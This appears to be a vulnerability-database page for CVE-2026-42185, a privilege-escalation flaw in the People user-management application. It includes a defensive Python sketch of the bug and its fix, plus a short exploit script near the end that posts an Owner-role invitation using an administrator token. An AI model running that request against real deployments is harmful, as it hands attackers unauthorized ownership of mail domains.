Security Vulnerability Report
CVE-2026-42185 CVSS 5.5 MEDIUM

Published: 2026-05-08 20:16:31
Last Modified: 2026-05-08 20:16:31

Description

People is an application to handle users and teams, and distribute permissions across La Suite. Prior to version 1.25.0, a user holding the Administrator role on a mail domain could send a crafted invitation request to promote any existing user (including users with no current domain access) to the Owner role. The exploit requires a single authenticated HTTP request and grants full domain ownership immediately, without any acceptance step from the target. This issue has been patched in version 1.25.0.
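The description is a textbook CWE-269 (improper privilege management) case: the invitation endpoint enforces who may invite but not what role the inviter may hand out, and the role takes effect without the target accepting. The following is an added illustration of the two checks a defender would want on such an endpoint, written for this page; it is not the People project's code and its names (Role, Domain, Invitation, create_invitation, accept_invitation) and its three-level role model are assumptions. The flawed shape is kept beside the hardened one so the difference is visible.

```python
"""Role-grant guard for a domain invitation endpoint (hypothetical model).

Not the People project's code; all names and the role hierarchy are assumed.
"""
from dataclasses import dataclass, field
from enum import IntEnum


class Role(IntEnum):
    """Ordered so that `<` expresses the hierarchy (assumed model)."""
    VIEWER = 1
    ADMINISTRATOR = 2
    OWNER = 3


class Forbidden(Exception):
    """Raised when the caller may not perform the requested grant."""


@dataclass
class Invitation:
    domain_id: str
    target_user_id: str
    role: Role
    accepted: bool = False


@dataclass
class Domain:
    domain_id: str
    # user_id -> Role; users without a membership are absent from the dict
    memberships: dict = field(default_factory=dict)
    invitations: list = field(default_factory=list)


def vulnerable_invite(domain, inviter_id, target_user_id, role):
    """Flawed pattern: checks that the inviter is an administrator, but caps
    neither the granted role nor requires acceptance; the role is applied
    immediately, even for a user with no membership in the domain."""
    if domain.memberships.get(inviter_id, Role.VIEWER) < Role.ADMINISTRATOR:
        raise Forbidden("only administrators may invite")
    domain.memberships[target_user_id] = role  # no cap on the granted role
    return domain.memberships[target_user_id]


def can_grant(inviter_role, requested):
    """Hardened rule: inviters must hold Administrator or above; only an Owner
    may grant Owner; an Administrator may grant roles strictly below their own."""
    if inviter_role < Role.ADMINISTRATOR:
        return False
    if inviter_role == Role.OWNER:
        return True
    return requested < inviter_role


def create_invitation(domain, inviter_id, target_user_id, role):
    """Server-side check on the role being granted, then a *pending* record."""
    inviter_role = domain.memberships.get(inviter_id)
    if inviter_role is None or not can_grant(inviter_role, role):
        raise Forbidden(f"{inviter_id} may not grant {role.name}")
    inv = Invitation(domain.domain_id, target_user_id, role)
    domain.invitations.append(inv)
    return inv


def accept_invitation(domain, inv, acting_user_id):
    """The role only takes effect once the invited user themselves accepts."""
    if acting_user_id != inv.target_user_id:
        raise Forbidden("only the invited user can accept")
    inv.accepted = True
    domain.memberships[acting_user_id] = inv.role
    return domain.memberships[acting_user_id]


def demo():
    """Constructed sample: an admin tries to promote an outsider to Owner."""
    seed = {"owner": Role.OWNER, "admin": Role.ADMINISTRATOR}
    flawed = Domain("example.test", dict(seed))
    vulnerable_invite(flawed, "admin", "outsider", Role.OWNER)
    escalated = flawed.memberships["outsider"]      # Role.OWNER: the bug

    hardened = Domain("example.test", dict(seed))
    try:
        create_invitation(hardened, "admin", "outsider", Role.OWNER)
        blocked = False
    except Forbidden:
        blocked = True                               # grant refused
    return escalated, blocked


if __name__ == "__main__":
    print(demo())
```

The two properties worth verifying in any fix for this class of bug are that the role cap is enforced on the server from the inviter's stored membership (never from anything in the request body) and that a privileged role is not written to the membership table until the target accepts.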

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No NVD configuration (CPE) data available yet (vulnStatus: Received).

Affected per the description: People < 1.25.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit for CVE-2026-42185: Privilege Escalation in People
# Note: Requires authentication as a Domain Administrator.
target_url = "https://<target-domain>/api/invitations"
headers = {
    "Authorization": "Bearer <ADMIN_TOKEN>",
    "Content-Type": "application/json"
}

# Malicious payload to promote user to Owner
payload = {
    "user_id": "<target_user_id>",
    "role": "Owner",
    "domain_id": "<domain_id>"
}

response = requests.post(target_url, json=payload, headers=headers)
if response.status_code == 200:
    print("[+] Success: User privileges escalated to Owner.")
else:
    print(f"[-] Failed: {response.status_code}")

References

https://github.com/suitenumerique/people/security/advisories/GHSA-42cf-rv2h-v8rf (GitHub Security Advisory)
https://github.com/suitenumerique/people/commit/6a51b96d8e907483fa8fc489d8714cc35fb4099b (fix commit)
https://github.com/suitenumerique/people/releases/tag/v1.25.0 (patched release)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42185", "sourceIdentifier": "[email protected]", "published": "2026-05-08T20:16:31.290", "lastModified": "2026-05-08T20:16:31.290", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "People is an application to handle users and teams, and distribute permissions across La Suite. Prior to version 1.25.0, a user holding the Administrator role on a mail domain could send a crafted invitation request to promote any existing user (including users with no current domain access) to the Owner role. The exploit requires a single authenticated HTTP request and grants full domain ownership immediately, without any acceptance step from the target. This issue has been patched in version 1.25.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://github.com/suitenumerique/people/commit/6a51b96d8e907483fa8fc489d8714cc35fb4099b", "source": "[email protected]"}, {"url": "https://github.com/suitenumerique/people/releases/tag/v1.25.0", "source": "[email protected]"}, {"url": "https://github.com/suitenumerique/people/security/advisories/GHSA-42cf-rv2h-v8rf", "source": "[email protected]"}, {"url": "https://github.com/suitenumerique/people/security/advisories/GHSA-42cf-rv2h-v8rf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}